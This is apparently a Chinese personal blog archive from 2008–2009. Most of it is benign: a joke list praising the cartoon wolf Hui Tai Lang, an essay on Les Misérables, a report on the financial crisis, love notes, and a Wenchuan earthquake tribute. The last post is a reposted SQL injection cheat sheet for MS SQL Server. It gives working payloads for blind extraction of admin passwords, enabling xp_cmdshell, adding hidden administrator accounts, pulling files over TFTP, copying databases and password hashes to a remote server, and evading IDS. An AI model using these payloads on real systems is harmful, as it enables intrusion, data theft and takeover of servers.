Biiyth

[转]灰太狼的十大优点

362010537@qq.com(Biiyth) — Wed, 08 Jul 2009 03:21:35 GMT

灰太狼的十大优点

第一条，灰太狼爱老婆胜过爱自己。
这可是男人必须要具备的哦。灰太狼每次抓到羊完全可以自己先吃掉，可是他一次都没有这样做，总是辛苦地把小羊们送到老婆大人面前，或煮或炸全由老婆说了算。这样的男人永远把老婆放在第一位，这可是嫁他的先决条件啊。

第二条，灰太狼热爱劳动。
别小看这一条啊，两口子过日子讲究的就是细节，干家务、带孩子那全是细节。虽然灰太狼每天都出去抓羊给老婆吃很辛苦，但他仍然坚持做家务，洗衣服、收拾房间，什么活都不用老婆插手，多热爱劳动啊，嫁给这样的男人女人就不用担心很快变黄脸婆了。

第三条，灰太狼聪明能干有毅力。
每次抓羊的点子都是他想出来的，而且准能抓。虽然羊最后都从锅里跑了，可这是剧情安排嘛，要不以后演啥？但每次失败了，灰太狼都会跟观众朋友们大喊一句：我一定会回来的！瞧，人家多有毅力。嫁给这样聪明能干的男人，万一在金融危机浪潮中失业了也不用害怕他翻不了身，人家有毅力，一定会回来的！好男人贵在品质。

第四条，灰太狼动手能力强。
他爱搞些发明创造，这要是在生活中啊，准是一动手能力强的男人。家里的保险丝断了，他修；马桶堵了，他通；水管漏了，他补；椅子腿折了，他钉。这种男人省心又省钱，多好。
第五条，灰太狼为老婆花钱从不心疼。
女人都爱美，红太狼想用十只羊换件虎皮大衣，虽然这对灰太狼来说是件难以完成的任务，但他眼睛都不眨就答应了。十只羊是笔不小的财富啊，灰太狼全拿来换大衣了。这种男人太让人感动了，找男人就要找一个舍得为你花钱的，值！

第六条，灰太狼从不花心，对老婆从一而终。
在当今小三泛滥的年代，灰太狼这种精神太值得学习和表扬了。虽然偶有抵挡不住小白狐的媚眼给人家献了殷勤，把抓到的青蛙送给对方的错误行为发生，但老婆一声召唤就会乖乖回家。这种优秀的男人不可能不被人惦记，只要不是原则性问题，原谅他就好了。

第七条，灰太狼从不藏私房钱。男人有钱就变坏。
私房钱可是导致男人变坏的温床。灰太狼抓到的羊一只不藏全留给老婆，这种精神可嘉，不藏私房钱的男人就是好男人！

第八条，灰太狼从不和老婆讨论对错。
老婆错了也是对的，红太狼说一不二，这种女人多有威严，太给女同胞们长脸了！嫁个这样的老公不用担心自己做错事，丝毫不用担心会发生家庭纠纷，舒心！

第九条，灰太狼会做饭。
没有羊的时候，灰太狼怕饿着老婆，亲自下厨为老婆大人做饭。毫无怨言。一个会做饭的男人可以把女人滋补得像花一样，这是当代男人必备的技能之一啊。

第十条，灰太狼会讨老婆欢心。
老婆不高兴了，灰太狼会想尽办法哄她开心。而且是打不还手、骂不还口那种类型的。不用担心家庭暴力的发生，有这样一个老公多
爽！
终上所述，找一个灰太狼这样的老公才是女人的最佳选择。当然了，灰太狼之所
以能成为女人心目中的偶像，还要归功于红太狼手里常常飞来飞去的那口平底锅。

“我不要苍茫的宇宙，我只要新鲜的羊肉！”
姓名：灰太狼
　　小名：灰灰（小时候的小名叫：小灰灰）
　　性别：公
　　口头禅：我一定会回来的！
　　身份：狼堡男主角，红太狼的老公，青青草原最聪明、最倒霉的大坏蛋。
　　属性：凶
　　颜色：灰色
　　爱好：抓羊
　　道具：《抓羊一百法》、发明
　　雄性大灰狼，住在草原边上的树林，是一个聪明、搞笑、倒霉的大坏蛋，平时在家爱钻研办法，练习偷鸡摸狗的技巧，一有机会就去骚扰羊部落，永远想偷羊吃，永远被喜羊羊识破打败，怕老婆，经常是老婆出口，他出手，事情没办好，就要受狼老婆的处罚。
　　人物特点：坚持不懈/欺软怕硬/成事不足，败事有余
　　智慧：★★★★
　　霉气：★★★★★
　　速度：★★★★
◆灰太狼◇の经典台词　　
1、我一定会回来的！
　　2、老婆，心急吃不了小肥羊！
　　3、差一点就成功了！
　　4、可恶的喜羊羊！
　　5、老婆~我去抓羊了！
　　6、亲爱的小肥羊们,我来了！
◆灰太狼◇の心中的她　　
　　她总是打灰太狼，说灰太狼笨蛋、没用、窝囊废，总爱把小白狼和灰太狼做比较。自己又很贪婪，总爱“坐收渔翁之利”。可是，红太狼也有善良的一面……
　　《三打红太狼》那一集，灰太狼从房顶上掉下来，说：“老婆，我再也不捉羊了！”红太狼并没有责怪灰太狼，而是很温柔很生气地说：“老公，你怎么了？是不是喜羊羊对你做了什么？你等着，我给你报仇去！”
　　还有一次，灰太狼假装摔断腿，红太狼很温柔，给他抓青蛙，上石膏……我记得最深的话“只有我才可以欺负灰太狼”、“竟敢欺负我老公”。怪不得灰太狼在《灰太狼日记》一集说：“或许大家觉得我被老婆打，被老婆骂很可怜吧。可是，我觉得她是世界上最好的老婆！”

那个世界，那个人——读《悲惨世界》有感　　

362010537@qq.com(Biiyth) — Sat, 07 Feb 2009 11:54:20 GMT

那个世界，那个人　　
——读《悲惨世界》有感　　
风儿抚摸着那张哀伤的面孔，黑暗中，迷失了方向；雨滴拍打着那遗忘的角落，记忆里，希望像泡沫般破灭；雷儿轰击着那悲惨的世界，迷蒙中，梦想随之离去。　　
饥饿交迫，迫使一个勤劳却在社会中失去立身之地的小伙子冉阿让偷了个面包，因此被送进监狱。从狱中释放后又在主教家偷银器，又被警员抓去，可是仁慈如天使的主教却说银器是冉阿让的，并让他离开这儿到别处去谋生。他靠这些银器兴办工厂，在法国的某个角落里造福于人民，并救助了一个外地妇人。后来因救一个人又被送进监狱，而后为了养女的幸福付出一切，自己在蜡烛的微光中度过，墙角依然是片黑暗。　　
在黑色里可以因窃一块白色面包而被送进监狱。我为那个只为穷人敞开而面对富人却永远关闭的监狱之门感到不公。我为之感到可悲，悲在腐朽的政府，没有明确的审判力；可悲在冉阿让的不幸；不幸在警员对穷人的狭隘之心，永远无法包容穷人的苦衷！　　
可以让人觉得安慰的是主教，他像那无眠的鸟儿，在教堂中眯眼诵经；他像那风儿，轻轻拂过树梢，给悄无声息的命运送来一些颤颤的姿色。向日葵也会向太阳伸长颈，因为有阳光的地方就会有希望。在这里我明白，像阳光一样，也许向日葵会因此而强盛；像大海一样，也许所有的浪涛会顿时汹涌，宏伟壮观。胜过干核爆炸时如磨菇云的威力。而核爆炸只将成为过去，因为核的毁坏，核的力量就如同腐朽的资产阶级。而浪涛是无数穷人的力量。主教拥有宽容，他想造就冉阿让的一生，他的做法让冉阿让很感动。　　
感动激起了冉阿让心中的那份正义，唤醒了他的思想，触动了他的灵魂。冉阿让在主教的帮助下最终成为市长。他尽一切自己可以发挥的力量来为穷人解苦解难。他获得了大多数市民的尊敬。　　
然而冉阿让的命运就如同夜空的烟花，精彩一瞬，转眼即逝。　　
叶落雁飞，幸福之中冉阿让踏上了消沉之路。他宁肯牺牲自己一生的幸福也不愿让一个因跟曾经的自己一样的穷人受到死亡的残酷。在法庭上冉阿让证明自己就是偷面包的前科犯，那穷人没有前科罪，穷人的生命因此而延续。我十分佩服冉阿让的勇气，能正确看待事实，不愿违背良心。他就如同给一个被困在胡同中的穷人一些温暖，给惊诧之中的穷人以生命的延续。冉阿让在那穷人眼中就是从未见过的圣明上帝的形象。　　
暴风雨来临前夕总是平静的！　　
平静过后亦是风暴。他失去了在众人面前的光彩，增加的无疑是对他的指指点点；他失去了市长的职位，开始跨入一个曾偷过面包的前科犯行列。这些人都曾受到冉阿让的帮助，为什么他们会那么忘恩负义？在那黑暗的社会中人的思想会发霉。我希望，让他们的思想暴晒在阳光下！被麻醉的思想在被麻醉的世界里继续蔓延，人们没有觉醒，哪有可能摆脱悲惨命运！　　
冉阿让又养育了一个失去母亲的孩子，让这个女孩子拥有美好的爱情，而自己却在小木屋中孤苦、被人误解中度过。最终，他在养女的第一次回家时死亡，死神无情地将冉阿让拉走，留下的是养女的眼泪。　　
我为这样冉阿让的一生而震撼，我为《悲惨世界》而悲伤，我为雨果的深刻而折服。　　
《悲惨世界》带给我的不仅是伤悲，更多的是勇敢、正义、理想的向往。

金融危机的调查报告

362010537@qq.com(Biiyth) — Sat, 07 Feb 2009 11:35:50 GMT

一、近来，随着全球经济形势的严峻，越来越多的企业开始受到冲击，利润空间加剧下滑。为了控制成本，裁员、减薪成为了企业方最常用、也是最优先考虑的方法。而失业、生存压力也就成为了近期备受关注的词汇。据今年年初国际劳工组织的专家预测，2009年全球失业人数将再创记录，达2.1亿人。而在国内，裁员狂潮也在地产、金融等企业的带领下迅猛袭来。
二、就业的压力
席卷全球的金融海啸,正在悄悄地波及大学生就业市场。一方面,预计2008年底有100万大学毕业生不能就业，2009年将有592万大学生毕业再加上往届没有就业的大学生预计上千万的失业大学生；研究生扩招这一政策并不看好，扩招无非只是把现在的就业压力转移到将来几年而已。没有从跟本上缓冲就业压力，将来还可能会出现研究生就业难。”另一方面，不少企业却取消了校园招聘计划，2009届大学生们已经感受到了就业前景的“寒流”。我们可以从这幅漫画中看出，毕业生的就业需求量与企业的就业岗位量相差很多，在金融风暴下，毕业生的就业前景不容乐观。招聘会的火爆场面也证实了这一点。
此次金融危机的冲击，会加剧对IT行业陈旧系统的升级改造和技术变化，越来越多的IT企业，通过产品开发，来推动产品的不断升级，只有这样，企业才会在新困境中逆势而起。同时，随着IT行业的不断发展，国内的中小型企业的信息化实现会越来越多。国内IT企业务必要把技术升级和市场战略结合起来。
三、金融为机，学好技能，长远发展
1金融危机影响的主要行业是金融和房地产行业，此次席卷全球的国际金融危机，包括IT业的股票整体下滑。然而，与欧美相比，由于我国IT行业产品和消费结构性的差异，再加上我国IT行业自身受宏观虚拟经济的影响有限，所以此次国际金融危机对我国IT行业的格局影响并不明显。
金山软件公司工作人员李小光透露，从目前公司杀毒软件产品的安装量和销售总额来看，金融危机对软件销售影响不大，“我们的产品主要针对个人用户，直接网上下载，手机付费，一般就是100元左右，应该不会受到金融危机影响。软件公司竞争压力主要是在产品的研发上，很少需要向银行贷款来支付研发人员工资，所以金融还款压力要小很多
(一) “金融危机”我国IT行业的机遇大于冲击
目前我国软件行业在软件外包业务方面主要面对亚非等发展中国家的消费市场。由于此次国际金融危机对于全球IT行业，特别是软件业的影响主要反映在欧美等IT强国。国内知名的金山、瑞星等国产软件相关负责人却表示，金融危机对IT企业的影响非常有限。我国软件产业将迎来重要的发展机遇期。“金融危机”我国IT行业的机遇大于冲击。
此次金融危机的冲击，会加剧对IT行业陈旧系统的升级改造和技术变化，越来越多的IT企业，通过产品开发，来推动产品的不断升级，只有这样，企业才会在新困境中逆势而起。同时，随着IT行业的不断发展，国内的中小型企业的信息化实现会越来越多。国内的IT企业务必要把技术升级和市场战略结合起来。
金融危机可能会使一批IT人才回流到中国，而且全球性大公司将会更加重视中国市场。金山软件公司工作人员李小光注意到，金融危机也许是国内IT企业一次发展的良机，“我们公司的策略是借机收购对我们产品研发有价值的美国技术型公司”。
(二) 金融为机，学好技能，长远发展
教育是终身投资。经济复苏后的竞争将越来越激烈，只有一技之长，才能让自己立于不败之地。”因此，经济危机来临时恰是读书好时机，建议职场人趁机“回炉”储备知识，既能增加就业筹码，也能待经济复苏时备用。建议不要只看眼前的利益，眼光应该放得更长远一些。
现在中国有3000家软件服务外包企业，行业整合并购的序幕已经展开。并购意味着国内软件企业招揽人才的一个机遇。更需要高、精、尖的技术人才，“金融为机”是一个难得的招揽IT人才的机遇。在宏观金融风暴影响下，国家也会把高科技信息产业作为重点发展关注的行业

默默的，守候在旁

362010537@qq.com(Biiyth) — Mon, 12 Jan 2009 17:26:08 GMT

或许，
是我做的太差，以至于我做任何事都会让他怀疑吧。
今天以后，不会了。
虽然无数次的发出感叹，但有无数次的被打击，到泯灭。
但是，对他的心，永远没有变过，不管我在做什么。

[转]小屁孩

362010537@qq.com(Biiyth) — Thu, 28 Aug 2008 04:28:20 GMT

相爱时，要跟他一起做的20件事：

2 .两个人在一张床上睡一晚，但除了抱抱、亲亲什么都不干

3 .选一天为彼此做一顿饭，然后面对面看着对方吃完

4 .为他写日记，不管会不会，哪怕就几个字也好

5 .难过或开心的时候抱着他大哭一场，但只让他看到你的泪

6 .跟他做一次短暂的分离，品尝一下相思的味道

7 .看一部两人都觉得无聊的电影，然后一起走神，将来谈起来都觉得好笑

8 .一定要亲口说一句“我爱你！”

9 .有机会的话，要在山顶上拥抱，背靠着背看星星

10. 把他的声音做成自己手机的铃声

11 .不要忘了“炫耀幸福”??随时做一对能让所有人羡慕的情侣，而且不能良心不安哦

12 .在有钱有时间的时候一起去旅游，让目的地成为你们爱的见证

13 .心血来潮的时候叫他“傻瓜”，也偶尔感受一下自己变成他口中的“傻瓜”时的乐趣

14 .你们可以忽略过去，但不可以否定未来

15 .相信一句话“你是我的全部，我是你的唯一”

16 .试着在过马路的时候调皮地闭上眼，然后感受他小心翼翼地牵着你安全地走到对面

17 .跟他去海边，有生之年一定要跟他看一次日出、日落

18 .没事就对他撒娇，等他受不了的时候就会反过来对你撒娇

19 .去你常去的论坛告诉所有的朋友你爱他

20 .让他多睡一会不吵他是为他着想，但如果睡觉的人是我，我真的宁愿他早点来吵醒我（爱情的力量，想不通……

这就是团州人~

362010537@qq.com(Biiyth) — Mon, 16 Jun 2008 04:01:42 GMT

这就是团州人~

云龙山上砍过树，小龟山里盗过墓，此生行尽天涯路，团州儿女就是酷。
注市桥上赶过场,恺撒洗浴嫖过娼，万里长城万里长，团州儿女就是强。
黄河里面下过海，火车东站挂过彩，青山颜色终不改，团州儿女就是拽。
西游记宫洗过澡， 110门上赛过跑，天若有情天亦老，团州儿女就是叼。
体育场里打过劫，二中门口飙过血，意气精魄坚如铁，团州儿女就是烈。
钻石钱柜唱过歌，摸吧里面嗨过舞，天下英雄皆入土，团州儿女就是虎。
农家小院流过汗，汉园宾馆吃过饭，也曾弯弓射大雁，团州儿女就是赞。
户部山上吹过风，省委砸门立过功，万山览遍此为峰，团州儿女就是凶

[转]生者不朽的爱是死者不朽的名

362010537@qq.com(Biiyth) — Mon, 19 May 2008 12:14:32 GMT

英国《每日电讯报》刊登的一幅照片，记录下中国抗震救灾过程中的一个感人瞬间：痛失爱妻的一名男子，用绳子将妻子的遗体绑在自己背后，骑着摩托车送她去太平间。在极大的悲痛中，他努力要给予遇难的妻子最后的尊严。给死者以尊严，让生命拥有自始至终的尊重，是中华民族的文化传统。《论语》中出现次数最多的孔门弟子子路，在灾难降临时正好衣冠，保持了最后的尊严，史称“结缨而死”。截至５月１８日１４时, 汶川大地震已造成３２４７６人死亡。这并不是抽象的数字，它每一次微小的跃升，都刺痛了每一个中国人的心。不宣而战的毁灭性灾害，顷刻间剥夺了那么多鲜活的生命，在我们每一个生者的心里，化作了一曲生命长歌。从此，我们将生活在他们突然被打断的生活里，他们将生活在我们倏然惊醒的记忆里。年年坟上生秋草，日日映秀到夕阳，无尽的哀思与怀念将渗透每一个人的心。 “既然幸存活了下来，就要好好地活着。”所有活着的中国人，都是汶川地震的幸存者。对于写作者，我们握着的就是遇难教师的笔；对于耕耘者，我们挥动着的就是遇难农夫的锄；对于旅行者，我们穿着的就是遇难行人的鞋。我们是失去父母者的父母，是失去孩子者的孩子。并不是每一个活着的人都有机会三尺遗孤带回家抚养，但只要他们的家园一日不能重建，我们的愁思就会与那片废墟同在。国务院决定，１９日至２１日为全国哀悼日。此时此刻，在这对遇难者最高的礼遇中，我们能听到一种声音：“我并没有离去，你这因想起我而哭的人，我只是改换了住处。我将在你心里长住，被爱的人将化作爱者的灵魂。” 泰戈尔说：“让生者有那不朽的爱，让死者有那不朽的名。”对于汶川地震中数万遇难者，我们谨以自己不朽的爱，赋予他们不朽的名。

分享]SQL注射语句的经典总结。不看后悔一辈子

362010537@qq.com(Biiyth) — Mon, 28 Apr 2008 02:18:44 GMT

[分享]SQL注射语句的经典总结。不看后悔一辈子

1.判断有无注入点
; and 1=1 and 1=2
2.猜表一般的表的名称无非是admin adminuser user pass password 等..
and 0<>(select count(*) from *)
and 0<>(select count(*) from admin) ---判断是否存在admin这张表
3.猜帐号数目如果遇到0< 返回正确页面 1<返回错误页面说明帐号数目就是1个
and 0<(select count(*) from admin)
and 1<(select count(*) from admin)
4.猜解字段名称在len( ) 括号里面加上我们想到的字段名称.
and 1=(select count(*) from admin where len(*)>0)--
and 1=(select count(*) from admin where len(用户字段名称name)>0)
and 1=(select count(*) from admin where len(密码字段名称password)>0)
5.猜解各个字段的长度猜解长度就是把>0变换直到返回正确页面为止
and 1=(select count(*) from admin where len(*)>0)
and 1=(select count(*) from admin where len(name)>6) 错误
and 1=(select count(*) from admin where len(name)>5) 正确长度是6
and 1=(select count(*) from admin where len(name)=6) 正确
and 1=(select count(*) from admin where len(password)>11) 正确
and 1=(select count(*) from admin where len(password)>12) 错误长度是12
and 1=(select count(*) from admin where len(password)=12) 正确
6.猜解字符
and 1=(select count(*) from admin where left(name,1)='a') ---猜解用户帐号的第一位
and 1=(select count(*) from admin where left(name,2)='ab')---猜解用户帐号的第二位
就这样一次加一个字符这样猜,猜到够你刚才猜出来的多少位了就对了,帐号就算出来了
and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) --
这个查询语句可以猜解中文的用户和密码.只要把后面的数字换成中文的ASSIC码就OK.最后把结果再转换成字符.
看服务器打的补丁=出错了打了SP4补丁
and 1=(select @@VERSION)--
看数据库连接账号的权限，返回正常，证明是服务器角色sysadmin权限。
and 1=(Select IS_SRVROLEMEMBER('sysadmin'))--
判断连接数据库帐号。（采用SA账号连接返回正常=证明了连接账号是SA）
and 'sa'=(Select System_user)--
and user_name()='dbo'--
and 0<>(select user_name()--
看xp_cmdshell是否删除
and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND
name = 'xp_cmdshell')--
xp_cmdshell被删除，恢复,支持绝对路径的恢复
;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll'--
;EXEC master.dbo.sp_addextendedproc
'xp_cmdshell','c:\inetpub\wwwroot\xplog70.dll'--
反向PING自己实验
;use master;declare @s int;exec sp_oacreate "w.shell",@s out;exec
sp_oamethod @s,"run",NULL,"cmd.exe /c ping 192.168.0.1";--
加帐号
;DECLARE @shell INT EXEC SP_OACreate 'w.shell',@shell OUTPUT EXEC
SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user
jiaoniang$ 1866574 /add'--
创建一个虚拟目录E盘：
;declare @o int exec sp_oacreate 'w.shell', @o out exec sp_oamethod
@o, 'run', NULL,' c.exe c：\inetpub\wwwroot\mkwebdir.vbs -w "默认Web站点"
-v "e","e：\"'--
访问属性：（配合写入一个webshell）
declare @o int exec sp_oacreate 'w.shell', @o out exec sp_oamethod
@o, 'run', NULL,' c.exe c：\inetpub\wwwroot\chaccess.vbs -a
w3svc/1/ROOT/e +browse'
爆库特殊技巧：:%5c='\' 或者把/和\ 修改%5提交
如何得到SQLSERVER某个数据库中所有表的表名？
--------------------------------------------------------------------------------
用户表：
select name from sysobjects where xtype = 'U';
系统表：
select name from sysobjects where xtype = 'S';
所有表：
select name from sysobjects where xtype = 'S' or xtype = 'U';
--------------------------------------------------------------------------------
and 0<>(select top 1 paths from newtable)--
得到库名（从1到5都是系统的id，6以上才可以判断）
and 1=(select name from master.dbo.sysdatabases where dbid=7)--
and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and
dbid=6)
依次提交 dbid = 7,8,9.... 得到更多的数据库名
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U') 暴到一个表
假设为 admin
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U' and name
not in ('Admin')) 来得到其他的表。
and 0<>(select count(*) from bbs.dbo.sysobjects where xtype='U' and
name='admin'
and uid>(str(id))) 暴到UID的数值假设为18779569 uid=id
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569)
得到一个admin的一个字段,假设为 user_id
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569 and
name not in
('id',...)) 来暴出其他的字段
and 0<(select user_id from BBS.dbo.admin where username>1) 可以得到用户名
依次可以得到密码。。。。。假设存在user_id username ,password 等字段
and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and
dbid=6)
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U') 得到表名
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U' and name
not in('Address'))
and 0<>(select count(*) from bbs.dbo.sysobjects where xtype='U' and
name='admin' and uid>(str(id))) 判断id值
and 0<>(select top 1 name from BBS.dbo.syscolumns where id=773577794) 所有字段
?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin
?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin
(union，access也好用)
得到WEB路径
;create table [dbo].[swap] ([swappass][char](255));--
and (select top 1 swappass from swap)=1--
;Create TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare
@test varchar(20) exec master..xp_regread @rootkey='HKEY_LOCAL_MACHINE',
@key='SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\',
@_name='/', s=@test OUTPUT insert into paths(path)
s(@test)--
;use ku1;--
;create table cmd (str image);-- 建立image类型的表cmd
存在xp_cmdshell的测试过程：
;exec master..xp_cmdshell 'dir'
;exec master.dbo.sp_addlogin jiaoniang$;-- 加SQL帐号
;exec master.dbo.sp_password null,jiaoniang$,1866574;--
;exec master.dbo.sp_addsrvrolemember jiaoniang$ sysadmin;--
;exec master.dbo.xp_cmdshell 'net user jiaoniang$ 1866574 /workstations:*
/times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--
;exec master.dbo.xp_cmdshell 'net localgroup administrators jiaoniang$
/add';--
exec master..xp_servicecontrol 'start', 'schedule' 启动服务
exec master..xp_servicecontrol 'start', 'server'
; DECLARE @shell INT EXEC SP_OACreate 'w.shell',@shell OUTPUT EXEC
SP_OAMETHOD @shell,'run',null, 'C：\WINNT\system32\cmd.exe /c net user
jiaoniang$ 1866574 /add'
;DECLARE @shell INT EXEC SP_OACreate 'w.shell',@shell OUTPUT EXEC
SP_OAMETHOD @shell,'run',null, 'C：\WINNT\system32\cmd.exe /c net
localgroup administrators jiaoniang$ /add'
'; exec master..xp_cmdshell 'tftp -i youip get file.exe'-- 利用TFTP上传文件
;declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\'
;declare @a sysname set @a='xp'+'_cm’+’dshell' exec @a 'dir c:\'
;declare @a;set @a=db_name();backup database @a to
disk='你的IP你的共享目录bak.dat'
如果被限制则可以。
select * from openrowset('sqloledb','server';'sa';'','select ''OK!'' exec
master.dbo.sp_addlogin hax')
查询构造：
Select * FROM news Where id=... AND topic=... AND .....
admin'and 1=(select count(*) from [user] where username='victim' and
right(left(userpass,01),1)='1') and userpass <>'
select 123;--
;use master;--
:a' or name like 'fff%';-- 显示有一个叫ffff的用户哈。
and 1<>(select count(email) from [user]);--
;update [users] set email=(select top 1 name from sysobjects where
xtype='u' and status>0) where name='ffff';--
;update [users] set email=(select top 1 id from sysobjects where xtype='u'
and name='ad') where name='ffff';--
';update [users] set email=(select top 1 name from sysobjects where
xtype='u' and id>581577110) where name='ffff';--
';update [users] set email=(select top 1 count(id) from password) where
name='ffff';--
';update [users] set email=(select top 1 pwd from password where id=2)
where name='ffff';--
';update [users] set email=(select top 1 name from password where id=2)
where name='ffff';--
上面的语句是得到数据库中的第一个用户表,并把表名放在ffff用户的邮箱字段中。
通过查看ffff的用户资料可得第一个用表叫ad
然后根据表名ad得到这个表的ID 得到第二个表的名字
insert into users s( 666,
char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73),
char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)--
insert into users s( 667,123,123,0xffff)--
insert into users s ( 123, 'admin''--', 'password', 0xffff)--
;and user>0
;and (select count(*) from sysobjects)>0
;and (select count(*) from mysysobjects)>0 //为access数据库
枚举出数据表名
;update aaa set aaa=(select top 1 name from sysobjects where xtype='u' and
status>0);--
这是将第一个表名更新到aaa的字段处。
读出第一个表，第二个表可以这样读出来（在条件后加上 and name<>'刚才得到的表名'）。
;update aaa set aaa=(select top 1 name from sysobjects where xtype='u' and
status>0 and name<>'vote');--
然后id=1552 and exists(select * from aaa where aaa>5)
读出第二个表，一个个的读出，直到没有为止。
读字段是这样：
;update aaa set aaa=(select top 1 col_name(object_id('表名'),1));--
然后id=152 and exists(select * from aaa where aaa>5)出错，得到字段名
;update aaa set aaa=(select top 1 col_name(object_id('表名'),2));--
然后id=152 and exists(select * from aaa where aaa>5)出错，得到字段名
[获得数据表名][将字段值更新为表名，再想法读出这个字段的值就可得到表名]
update 表名 set 字段=(select top 1 name from sysobjects where xtype=u and
status>0 [ and name<>'你得到的表名' 查出一个加一个]) [ where 条件] select top 1 name from
sysobjects where xtype=u and status>0 and name not in('table1','table2',…)
通过SQLSERVER注入漏洞建数据库管理员帐号和系统管理员帐号[当前帐号必须是SYSADMIN组]
[获得数据表字段名][将字段值更新为字段名，再想法读出这个字段的值就可得到字段名]
update 表名 set 字段=(select top 1 col_name(object_id('要查询的数据表名'),字段列如:1) [
where 条件]
绕过IDS的检测[使用变量]
;declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\'
;declare @a sysname set @a='xp'+'_cm’+’dshell' exec @a 'dir c:\'
1、开启远程数据库
基本语法
select * from OPENROWSET('SQLOLEDB', 'server=servername;uid=sa;pwd=123',
'select * from table1' )
参数: (1) OLEDB Provider name
2、其中连接字符串参数可以是任何端口用来连接,比如
select * from OPENROWSET('SQLOLEDB',
'uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;', 'select *
from table'
3.复制目标主机的整个数据库insert所有远程表到本地表。
基本语法：
insert into OPENROWSET('SQLOLEDB', 'server=servername;uid=sa;pwd=123',
'select * from table1') select * from table2
这行语句将目标主机上table2表中的所有数据复制到远程数据库中的table1表中。实际运用中适当修改连接字符串的IP地址和端口，指向需要的地方，比如：
insert into
OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select
* from table1') select * from table2
insert into
OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select
* from _sysdatabases')
select * from master.dbo.sysdatabases
insert into
OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select
* from _sysobjects')
select * from user_database.dbo.sysobjects
insert into
OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select
* from _syscolumns')
select * from user_database.dbo.syscolumns
复制数据库：
insert into
OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select
* from table1') select * from database..table1
insert into
OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select
* from table2') select * from database..table2
复制哈西表（HASH）登录密码的hash存储于sysxlogins中。方法如下：
insert into OPENROWSET('SQLOLEDB',
'uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select * from
_sysxlogins') select * from database.dbo.sysxlogins
得到hash之后，就可以进行暴力破解。
遍历目录的方法：先创建一个临时表：temp
';create table temp(id nvarchar(255),num1 nvarchar(255),num2
nvarchar(255),num3 nvarchar(255));--
';insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器
';insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表
';insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';--
获得所有子目录的目录树结构,并寸入temp表中
';insert into temp(id) exec master.dbo.xp_cmdshell 'type
c:\web\index.asp';-- 查看某个文件的内容
';insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\';--
';insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\ *.asp /s/a';--
';insert into temp(id) exec master.dbo.xp_cmdshell 'c
C:\Inetpub\Admins\adsutil.vbs enum w3svc'
';insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';--
（xp_dirtree适用权限PUBLIC）
写入表：
语句1：and 1=(Select IS_SRVROLEMEMBER('sysadmin'));--
语句2：and 1=(Select IS_SRVROLEMEMBER('serveradmin'));--
语句3：and 1=(Select IS_SRVROLEMEMBER('setupadmin'));--
语句4：and 1=(Select IS_SRVROLEMEMBER('securityadmin'));--
语句5：and 1=(Select IS_SRVROLEMEMBER('securityadmin'));--
语句6：and 1=(Select IS_SRVROLEMEMBER('diskadmin'));--
语句7：and 1=(Select IS_SRVROLEMEMBER('bulkadmin'));--
语句8：and 1=(Select IS_SRVROLEMEMBER('bulkadmin'));--
语句9：and 1=(Select IS_MEMBER('db_owner'));--
把路径写到表中去：
;create table dirs(paths varchar(100), id int)--
;insert dirs exec master.dbo.xp_dirtree 'c:\'--
and 0<>(select top 1 paths from dirs)--
and 0<>(select top 1 paths from dirs where paths not in('@Inetpub'))--
;create table dirs1(paths varchar(100), id int)--
;insert dirs exec master.dbo.xp_dirtree 'e:\web'--
and 0<>(select top 1 paths from dirs1)--
把数据库备份到网页目录：下载
;declare @a sysname; set @a=db_name();backup database @a to
disk='e:\web\down.bak';--
and 1=(Select top 1 name from(Select top 12 id,name from sysobjects where
xtype=char(85)) T order by id desc)
and 1=(Select Top 1 col_name(object_id('USER_LOGIN'),1) from sysobjects)
参看相关表。
and 1=(select user_id from USER_LOGIN)
and 0=(select user from USER_LOGIN where user>1)
-=- w.shell example -=-
declare @o int
exec sp_oacreate 'w.shell', @o out
exec sp_oamethod @o, 'run', NULL, 'notepad.exe'
'; declare @o int exec sp_oacreate 'w.shell', @o out exec
sp_oamethod @o, 'run', NULL, 'notepad.exe'--
declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate 'ing.filesystemobject', @o out
exec sp_oamethod @o, 'opentextfile', @f out, 'c:\boot.ini', 1
